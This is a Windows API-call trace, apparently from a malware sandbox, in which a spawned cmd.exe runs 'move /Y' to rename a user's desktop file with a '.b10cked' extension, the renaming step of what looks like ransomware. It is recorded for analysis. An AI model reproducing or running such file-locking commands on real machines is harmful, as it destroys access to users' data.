GetConsoleOutputCP () returned 0x1b5 [0220.714] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.715] SetConsoleCtrlHandler (HandlerRoutine=0x4a1de72a, Add=1) returned 1 [0220.715] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.715] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0220.715] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.715] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0220.715] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.715] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0220.715] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.715] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0220.715] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.715] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0220.715] GetEnvironmentStringsW () returned 0x320168* [0220.716] FreeEnvironmentStringsW (penv=0x320168) returned 1 [0220.716] GetEnvironmentStringsW () returned 0x320168* [0220.716] FreeEnvironmentStringsW (penv=0x320168) returned 1 [0220.716] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24e71c | out: phkResult=0x24e71c*=0x40) returned 0x0 [0220.716] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24e724, lpData=0x24e728, lpcbData=0x24e720*=0x1000 | out: lpType=0x24e724*=0x0, lpData=0x24e728*=0x90, lpcbData=0x24e720*=0x1000) returned 0x2 [0220.716] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24e724, lpData=0x24e728, lpcbData=0x24e720*=0x1000 | out: lpType=0x24e724*=0x4, lpData=0x24e728*=0x1, lpcbData=0x24e720*=0x4) returned 0x0 [0220.716] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24e724, lpData=0x24e728, lpcbData=0x24e720*=0x1000 | out: 
lpType=0x24e724*=0x0, lpData=0x24e728*=0x1, lpcbData=0x24e720*=0x1000) returned 0x2 [0220.716] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24e724, lpData=0x24e728, lpcbData=0x24e720*=0x1000 | out: lpType=0x24e724*=0x4, lpData=0x24e728*=0x0, lpcbData=0x24e720*=0x4) returned 0x0 [0220.716] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24e724, lpData=0x24e728, lpcbData=0x24e720*=0x1000 | out: lpType=0x24e724*=0x4, lpData=0x24e728*=0x40, lpcbData=0x24e720*=0x4) returned 0x0 [0220.716] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24e724, lpData=0x24e728, lpcbData=0x24e720*=0x1000 | out: lpType=0x24e724*=0x4, lpData=0x24e728*=0x40, lpcbData=0x24e720*=0x4) returned 0x0 [0220.716] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24e724, lpData=0x24e728, lpcbData=0x24e720*=0x1000 | out: lpType=0x24e724*=0x0, lpData=0x24e728*=0x40, lpcbData=0x24e720*=0x1000) returned 0x2 [0220.716] RegCloseKey (hKey=0x40) returned 0x0 [0220.716] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24e71c | out: phkResult=0x24e71c*=0x40) returned 0x0 [0220.716] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24e724, lpData=0x24e728, lpcbData=0x24e720*=0x1000 | out: lpType=0x24e724*=0x0, lpData=0x24e728*=0x40, lpcbData=0x24e720*=0x1000) returned 0x2 [0220.716] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24e724, lpData=0x24e728, lpcbData=0x24e720*=0x1000 | out: lpType=0x24e724*=0x4, lpData=0x24e728*=0x1, lpcbData=0x24e720*=0x4) returned 0x0 [0220.716] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24e724, lpData=0x24e728, lpcbData=0x24e720*=0x1000 | out: lpType=0x24e724*=0x0, lpData=0x24e728*=0x1, lpcbData=0x24e720*=0x1000) 
returned 0x2 [0220.716] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24e724, lpData=0x24e728, lpcbData=0x24e720*=0x1000 | out: lpType=0x24e724*=0x4, lpData=0x24e728*=0x0, lpcbData=0x24e720*=0x4) returned 0x0 [0220.716] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24e724, lpData=0x24e728, lpcbData=0x24e720*=0x1000 | out: lpType=0x24e724*=0x4, lpData=0x24e728*=0x9, lpcbData=0x24e720*=0x4) returned 0x0 [0220.716] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24e724, lpData=0x24e728, lpcbData=0x24e720*=0x1000 | out: lpType=0x24e724*=0x4, lpData=0x24e728*=0x9, lpcbData=0x24e720*=0x4) returned 0x0 [0220.716] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24e724, lpData=0x24e728, lpcbData=0x24e720*=0x1000 | out: lpType=0x24e724*=0x0, lpData=0x24e728*=0x9, lpcbData=0x24e720*=0x1000) returned 0x2 [0220.716] RegCloseKey (hKey=0x40) returned 0x0 [0220.717] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b6 [0220.717] srand (_Seed=0x5b8863b6) [0220.717] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\DCFT2D~1.OTS\" \"C:\\Users\\EEBsYm5\\Desktop\\dcFt2Dy7M6d8J9.ots.b10cked\"" [0220.717] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\DCFT2D~1.OTS\" \"C:\\Users\\EEBsYm5\\Desktop\\dcFt2Dy7M6d8J9.ots.b10cked\"" [0220.717] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.717] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3218c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0220.717] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1f0640, nSize=0x2000 | out: 
lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0220.717] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0220.717] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.717] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0220.717] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0220.717] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0220.717] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0220.717] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0220.717] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0220.717] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0220.717] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0220.717] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0220.718] GetEnvironmentStringsW () returned 0x3222b8* [0220.718] FreeEnvironmentStringsW (penv=0x3222b8) returned 1 [0220.718] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.718] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.718] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0220.718] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0220.718] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0220.718] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0220.718] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0220.718] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0220.718] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 
[0220.718] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0220.718] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24f4e8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.718] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x24f4e8, lpFilePart=0x24f4e4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24f4e4*="Desktop") returned 0x18 [0220.718] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.718] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f264 | out: lpFindFileData=0x24f264) returned 0x31fff8 [0220.718] FindClose (in: hFindFile=0x31fff8 | out: hFindFile=0x31fff8) returned 1 [0220.718] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x24f264 | out: lpFindFileData=0x24f264) returned 0x31fff8 [0220.718] FindClose (in: hFindFile=0x31fff8 | out: hFindFile=0x31fff8) returned 1 [0220.718] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x24f264 | out: lpFindFileData=0x24f264) returned 0x31fff8 [0220.719] FindClose (in: hFindFile=0x31fff8 | out: hFindFile=0x31fff8) returned 1 [0220.719] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.719] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0220.719] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0220.719] GetEnvironmentStringsW () returned 0x322ad8* [0220.719] FreeEnvironmentStringsW (penv=0x322ad8) returned 1 [0220.719] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.719] GetConsoleOutputCP () returned 0x1b5 [0220.719] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) 
returned 1 [0220.719] GetUserDefaultLCID () returned 0x409 [0220.720] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a1e4950, cchData=8 | out: lpLCData=":") returned 2 [0220.720] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24f628, cchData=128 | out: lpLCData="0") returned 2 [0220.720] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24f628, cchData=128 | out: lpLCData="0") returned 2 [0220.720] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24f628, cchData=128 | out: lpLCData="1") returned 2 [0220.720] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a1e4940, cchData=8 | out: lpLCData="/") returned 2 [0220.720] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a1e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0220.720] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a1e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0220.720] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a1e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0220.720] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a1e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0220.720] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a1e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0220.720] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a1e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0220.720] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a1e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0220.720] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a1e4930, cchData=8 | out: lpLCData=".") returned 2 [0220.720] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a1e4920, cchData=8 | out: lpLCData=",") returned 2 [0220.720] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0220.721] GetConsoleTitleW (in: lpConsoleTitle=0x3108d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b 
[0220.721] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.721] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0220.721] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0220.721] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0220.722] _wcsicmp (_String1="move", _String2=")") returned 68 [0220.722] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0220.722] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0220.722] _wcsicmp (_String1="IF", _String2="move") returned -4 [0220.722] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0220.722] _wcsicmp (_String1="REM", _String2="move") returned 5 [0220.722] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0220.724] GetConsoleTitleW (in: lpConsoleTitle=0x24f320, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.725] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0220.725] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0220.725] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0220.725] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0220.725] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0220.725] _wcsicmp (_String1="move", _String2="CD") returned 10 [0220.725] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0220.725] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0220.725] _wcsicmp (_String1="move", _String2="REN") returned -5 [0220.725] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0220.725] _wcsicmp (_String1="move", _String2="SET") returned -6 [0220.725] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0220.725] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0220.725] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0220.725] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0220.725] _wcsicmp 
(_String1="move", _String2="MD") returned 11 [0220.725] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0220.725] _wcsicmp (_String1="move", _String2="RD") returned -5 [0220.725] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0220.725] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0220.725] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0220.725] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0220.725] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0220.725] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0220.725] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0220.725] _wcsicmp (_String1="move", _String2="VER") returned -9 [0220.725] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0220.725] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0220.725] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0220.725] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0220.725] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0220.725] _wcsicmp (_String1="move", _String2="START") returned -6 [0220.725] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0220.725] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0220.725] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0220.727] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.727] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.727] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24f0dc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x24f0d4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24f0d4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0220.727] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0220.727] _wcsnicmp (_String1="COPYCMD", 
_String2="ALLUSER", _MaxCount=0x7) returned 2 [0220.727] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0220.727] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0220.727] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0220.727] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0220.727] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0220.727] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0220.727] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0220.727] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0220.727] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0220.727] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0220.727] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0220.727] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0220.727] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0220.727] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.727] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.727] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.728] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.728] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.728] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.728] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0220.728] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0220.728] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) 
returned -13 [0220.728] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0220.728] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0220.728] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0220.728] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0220.728] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0220.728] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0220.728] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0220.728] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0220.728] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0220.728] _wcsicmp (_String1="DCFT2D~1.OTS", _String2=".") returned 54 [0220.728] _wcsicmp (_String1="DCFT2D~1.OTS", _String2="..") returned 54 [0220.728] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\DCFT2D~1.OTS" (normalized: "c:\\users\\eebsym5\\desktop\\dcft2d~1.ots")) returned 0x20 [0220.728] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x321d40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.728] SetErrorMode (uMode=0x0) returned 0x0 [0220.728] SetErrorMode (uMode=0x1) returned 0x0 [0220.729] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\DCFT2D~1.OTS", nBufferLength=0x104, lpBuffer=0x24ea64, lpFilePart=0x24ea4c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\DCFT2D~1.OTS", lpFilePart=0x24ea4c*="DCFT2D~1.OTS") returned 0x25 [0220.729] SetErrorMode (uMode=0x0) returned 0x1 [0220.729] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.729] _wcsicmp (_String1="DCFT2D~1.OTS", _String2=".") returned 54 [0220.729] _wcsicmp (_String1="DCFT2D~1.OTS", _String2="..") returned 54 [0220.729] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\Desktop\\DCFT2D~1.OTS" (normalized: "c:\\users\\eebsym5\\desktop\\dcft2d~1.ots")) returned 0x20 [0220.729] SetErrorMode (uMode=0x0) returned 0x0 [0220.729] SetErrorMode (uMode=0x1) returned 0x0 [0220.729] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\DCFT2D~1.OTS", nBufferLength=0x104, lpBuffer=0x24eee0, lpFilePart=0x24ec78 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\DCFT2D~1.OTS", lpFilePart=0x24ec78*="DCFT2D~1.OTS") returned 0x25 [0220.729] SetErrorMode (uMode=0x0) returned 0x1 [0220.729] SetErrorMode (uMode=0x0) returned 0x0 [0220.729] SetErrorMode (uMode=0x1) returned 0x0 [0220.729] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\dcFt2Dy7M6d8J9.ots.b10cked", nBufferLength=0x104, lpBuffer=0x24f0e8, lpFilePart=0x24ec78 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\dcFt2Dy7M6d8J9.ots.b10cked", lpFilePart=0x24ec78*="dcFt2Dy7M6d8J9.ots.b10cked") returned 0x33 [0220.729] SetErrorMode (uMode=0x0) returned 0x1 [0220.729] SetLastError (dwErrCode=0x0) [0220.729] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\dcFt2Dy7M6d8J9.ots.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\dcft2dy7m6d8j9.ots.b10cked")) returned 0xffffffff [0220.729] GetLastError () returned 0x2 [0220.729] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\DCFT2D~1.OTS", fInfoLevelId=0x1, lpFindFileData=0x24e5f4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24e5f4) returned 0x310f08 [0220.729] FindNextFileW (in: hFindFile=0x310f08, lpFindFileData=0x24e5f4 | out: lpFindFileData=0x24e5f4) returned 0 [0220.730] GetLastError () returned 0x12 [0220.730] FindClose (in: hFindFile=0x310f08 | out: hFindFile=0x310f08) returned 1 [0220.731] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\DCFT2D~1.OTS", fInfoLevelId=0x1, lpFindFileData=0x321ae0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x321ae0) returned 0x310f08 [0220.731] 
GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\dcFt2Dy7M6d8J9.ots.b10cked", nBufferLength=0x104, lpBuffer=0x24e88c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\dcFt2Dy7M6d8J9.ots.b10cked", lpFilePart=0x0) returned 0x33 [0220.731] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\dcFt2Dy7M6d8J9.ots", nBufferLength=0x104, lpBuffer=0x24e88c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\dcFt2Dy7M6d8J9.ots", lpFilePart=0x0) returned 0x2b [0220.731] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\dcFt2Dy7M6d8J9.ots" (normalized: "c:\\users\\eebsym5\\desktop\\dcft2dy7m6d8j9.ots")) returned 0x20 [0220.731] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\dcFt2Dy7M6d8J9.ots" (normalized: "c:\\users\\eebsym5\\desktop\\dcft2dy7m6d8j9.ots"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\dcFt2Dy7M6d8J9.ots.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\dcft2dy7m6d8j9.ots.b10cked"), dwFlags=0x3) returned 1 [0220.731] FindClose (in: hFindFile=0x310f08 | out: hFindFile=0x310f08) returned 1 [0220.732] _vsnwprintf (in: _Buffer=0x4a1e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x24e840 | out: _Buffer=" 1") returned 9 [0220.732] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.732] GetFileType (hFile=0x7) returned 0x2 [0222.927] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0222.927] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24e7cc | out: lpMode=0x24e7cc) returned 1 [0222.928] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.928] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x24e800 | out: lpConsoleScreenBufferInfo=0x24e800) returned 1 [0222.928] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0222.928] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, 
lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x24e840 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0222.928] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a1f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x24e824, lpReserved=0x0 | out: lpBuffer=0x4a1f4640*, lpNumberOfCharsWritten=0x24e824*=0x1a) returned 1 [0222.929] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.929] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0222.929] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.929] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0222.929] _get_osfhandle (_FileHandle=0) returned 0x3 [0222.929] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0222.929] SetConsoleInputExeNameW () returned 0x1 [0222.929] GetConsoleOutputCP () returned 0x1b5 [0222.929] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0222.929] SetThreadUILanguage (LangId=0x0) returned 0x409 [0222.929] exit (_Code=0) Process: id = "578" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16e00" os_pid = "0xedc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\DDLQZM~1.PNG\" 